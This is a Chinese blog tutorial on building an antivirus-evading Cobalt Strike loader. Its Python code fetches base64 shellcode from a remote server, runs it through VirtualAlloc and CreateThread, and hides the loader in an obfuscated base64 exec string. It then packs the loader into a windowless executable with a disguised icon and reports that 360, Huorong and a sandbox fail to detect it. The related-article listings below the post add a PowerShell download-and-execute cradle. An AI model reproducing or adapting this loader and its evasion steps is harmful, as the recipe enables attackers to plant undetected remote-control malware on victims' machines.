CS分离免杀实践

最新推荐文章于 2024-06-03 10:51:09 发布
最新推荐文章于 2024-06-03 10:51:09 发布
阅读量2.1k 收藏 13
点赞数
分类专栏: 木马后门 内网渗透 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/119335217
版权

CS分离免杀实战


在这里插入图片描述
本次实践参考小刚师傅的教程,详细原理请看原文: https://mp.weixin.qq.com/

一、原理简述

          通过python requests远程下载经过base64编码后的shellcodeloader,然后解码通过exec函数先执行loader,通过loader加载shellcode,最终达到CS上线目的。

二、环境配置

  • python2.7
  • pyinstaller 3.0.0
  • win10

为了防止不同版本出现的幺蛾子,在此供上我的python安装包。
链接:https://pan.baidu.com/s/1ek3LYU8xqqjfQdqqt-dF8g
提取码:1v27

三、本地测试

1.生成shellcode

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
保留payload.c中的双引号部分内容,并将\x换为空,得到以fc开头的一串字符。之后将其base64编码放进服务器https://xxxxxxxx/1.txt备用。
在这里插入图片描述

2.代码变形

加载器源码如下:

import ctypes
import requests
import base64

#下载shellcode
scode = requests.get ("https://xxxxxxxx/1.txt")

# 解码转换为字节类型文件
shellcode = bytearray (base64.b64decode (scode.text).decode ('hex'))

# VirtualAlloc申请内存,并使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64(系统位数)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

# LPVOID VirtualAlloc{LPVOID lpAddress, #要分配的内存区域的地址
#                     DWORD dwSize,      #分配的大小
#                     DWORD flAllocationType, #分配的类型
#                     DWORD flProtect     #该内存的初始保护属性
#                     };

ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0),
                                           ctypes.c_int (len (shellcode)),
                                           ctypes.c_int (0x3000),
                                           ctypes.c_int (0x40))
# 确定shellcode的大小
buf = (ctypes.c_char * len (shellcode)).from_buffer (shellcode)
# 从指定内存地址将内容复制到申请的内存中去
ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_int (ptr),
                                      buf,
                                      ctypes.c_int (len (shellcode)))

# 创建线程
handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0),
                                              ctypes.c_int (0),
                                              ctypes.c_uint64 (ptr),
                                              ctypes.c_int (0),
                                              ctypes.c_int (0),
                                              ctypes.pointer (ctypes.c_int (0)))

# 调用WaitForSingleObject函数用来检测线程的状态
ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (-1))

变形后如下:

import ctypes
import requests
import base64

if __name__ == '__main__':
    scode = '''fc4883e................'''
    shellcode = bytearray (scode.decode('hex'))
    loader = '''Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSxjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkpO2J1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKTtoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkp'''
    exec (base64.b64decode(loader))

由于考虑到网络原因和python编码问题(request下载按照的是unicode编码,直接decode(‘hex’)要报错,可能和版本也有关系),可能有幺蛾子,所以就把shellcode和loader放在代码里了。

3.pyinstaller打包

需要事先装几个模块

python -m pip install requests
python -m pip install pyinstaller==3.0
python -m pip install pypiwin32

如果网速太慢的话就用国内的镜像,后面加几个命令,例如:

python -m pip install pypiwin32 -i http://mirrors.aliyun.com/pypi/simple/  --trusted-host mirrors.aliyun.com

之后打包:

pyinstaller -F local-anti.py -i Favicon.ico -w

关于pyinstaller这几个打包的参数说明如下:
在这里插入图片描述
在dist目录下生成local-anti.exe,运行成功上线:
在这里插入图片描述

4.免杀测试

360:
在这里插入图片描述
火绒:
在这里插入图片描述
微步沙箱:
在这里插入图片描述
看下来只有微软引擎报毒,看来还可以。

5.其他扩展

测试过程中发现如果在中文路径下存在无法运行的情况,经测试发现在pyinstaller == 2.0 的版本下可行。
image-20211109153644863
下载链接:https://files.pythonhosted.org/packages/52/e5/0ce68034f3441bda11538162796dac5a8e5873e8af5d23aaea65e81c7e51/pyinstaller-2.0.zip

直接解压在pyinstaller2.0的目录下运行打包,直接安装貌似会报错。

C:\Users\Administrator\Desktop\pyinstaller-2.0>python pyinstaller.py -F "C:\Users\Administrator\Desktop\1\shell.py" -w

之后就算是中文路径,也能够顺利执行了。

痴人说梦梦中人
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS-Loader:CS免杀
03-22
CS-避免杀CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 717
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
简单免杀绕过和利用上线的GoCS
最新发布
2401_84488537的博客
06-03 1101
第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。这个版本很基础,很简单进行利用,所以只能在简单环境下利用,希望后面能加入更多的元素,让这个插件适应更多复杂环境。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
C实现分离免杀
春日野穹
02-28 2380
前期准备 1.编译好mian.exe,源码如下 #include <stdio.h> #include <windows.h> int main(int argc,char* argv[]) { //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)
CS免杀
anwen12的博客
02-06 5081
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
xiaoheizi的博客
09-24 1367
无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。
Payload 实现分离免杀
weixin_30790841的博客
08-10 537
众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。 通过C语言编译后门 1.首先使用msfvenom命令生成一句简短的shellcode,这里指定连接地址为IP=192.168.1.7,PORT=8888,当执行sh...
msf shellcode分离免杀技术
good good study
05-27 1916
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
杀软及免杀原理
weixin_43526443的博客
07-02 1563
目录 0x01杀软原理 1、扫描技术 2、主动防御技术 3、监测技术 4、机器学习识别技术 0x02免杀原理 1、源头特征修改 2、花指令免杀 3、加壳免杀 4、内存免杀 5、二次编译 6、分离免杀 7、资源修改 8、底层接口干扰 0x01杀软原理 1、扫描技术 1、特征码扫描 将内存、文件扫描出的特征信息与病毒特征数据库进行对比。(存在黑白名单) 2、文件校验和法 每次...
免杀原理详解(二)
byteway的专栏
12-18 1527
一:灰鸽子免杀方法大全在所有的版本中,黑防的鸽子算是比较好做免杀的了,今天在这里,我就用他做案例1,最经典的OD一半一半定位法我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星杀内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有杀到就说明我们刚刚nop的一半中含有特征代码。所演示的情况是特征代码在没有nop 掉的一半,然
28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
FrpProPlugin:frp0.33修改版,过流量检测,免杀,支持加载远程配置文件可用于cs直接使用的插件
03-04
FrpPro插件 frp0.33修改版,过流量检测,免杀,支持加载远程配置文件可用于c直接使用的插件。需要服务端适应,可以在realease下载对应平台的服务端。 更新时间线 2021.2.19免杀更新+缩小体积 功能介绍 主要包括上载,指定frpc的位置,这里需要注意观察一下,先要确保frpc.exe完整上传了 一般要1-2分钟,需要耐心等待下 然后配置文件的URL: 最后执行完成删除frpc(自动查找进程,然后删除掉文件): 应用效果
免杀初阶Ch.2 无特征码免杀之修改程序入口点
04-27
免杀初阶Ch.2 无特征码免杀之修改程序入口点 (免杀初阶教学)
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
CS-Avoid-killing:CS免杀加载器
05-05
CS-Avoid-killing :cricket_game:CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常V1.0: 目前测试可以过Defender/火绒的静杀+动杀,360还没测= =不想装360全家桶了,...
65.远控免杀专题(65)-shellcode免杀实践1
08-03
【网络安全与Web安全专题——免杀技术解析】 在网络安全领域,免杀技术是黑客和安全研究人员用来规避反病毒软件检测的重要手段。本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码...
cs1.6击杀插件带仿CSOL武器模型.rar
10-19
cs1.6击杀插件带仿CSOL武器模型
前后端分离的思考与实践(下)
01-30
在前后端分离的开发模式中,从开发的角色和职能上来讲,一个最明显的变化就是:以往传统中,只负责浏览器环境中开发的前端同学,需要涉猎到服务端层面,编写服务端代码。而摆在面前的一个基础性问题就是如何保障Web...
哈工深cs预推免机试题
09-23
哈工深cs预推免机试题是哈尔滨工业大学(深圳)计算机科学与技术专业预推免研究生的机试题目。根据题目提供的信息,我无法具体列举出所有的题目,但可以就预推免机试题的一般内容进行简要介绍。 预推免机试题一般包括以下几个方面的内容:数据结构与算法、计算机网络、操作系统、数据库和程序设计语言。在预推免机试中,会对考生的基础知识和能力进行测试,以确定是否具备进一步深入学习和研究的能力。 在数据结构与算法方面,可能会涉及到常见的数据结构,如数组、链表、栈、队列、树等,要求考生掌握它们的基本操作和应用场景。同时,还可能会涉及到各种算法,如排序算法、查找算法和图算法等,要求考生了解其原理和应用。 计算机网络方面的题目可能会涉及到网络体系结构、TCP/IP协议簇、网络编程等方面的内容,要求考生了解网络的基本原理和工作机制。 操作系统方面的题目可能会涉及到进程管理、内存管理、文件系统等内容,要求考生了解操作系统的基本原理和操作。 数据库方面的题目可能会涉及到数据库的基本概念、关系数据库的设计与管理、SQL语言等方面的内容,要求考生了解数据库的基本原理和应用。 程序设计语言方面的题目可能会涉及到C/C++、Java等常用编程语言的语法、数据类型、面向对象编程等内容,要求考生熟悉至少一种编程语言的基本知识和编程能力。 总的来说,哈工深cs预推免机试题的目的是评估考生的计算机科学与技术基础知识和能力,考察其是否具备进一步深入学习和研究的潜力。希望通过此次机试,能够选拔出具备优秀计算机专业基础的考生,为哈尔滨工业大学(深圳)计算机科学与技术专业的研究生培养贡献力量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值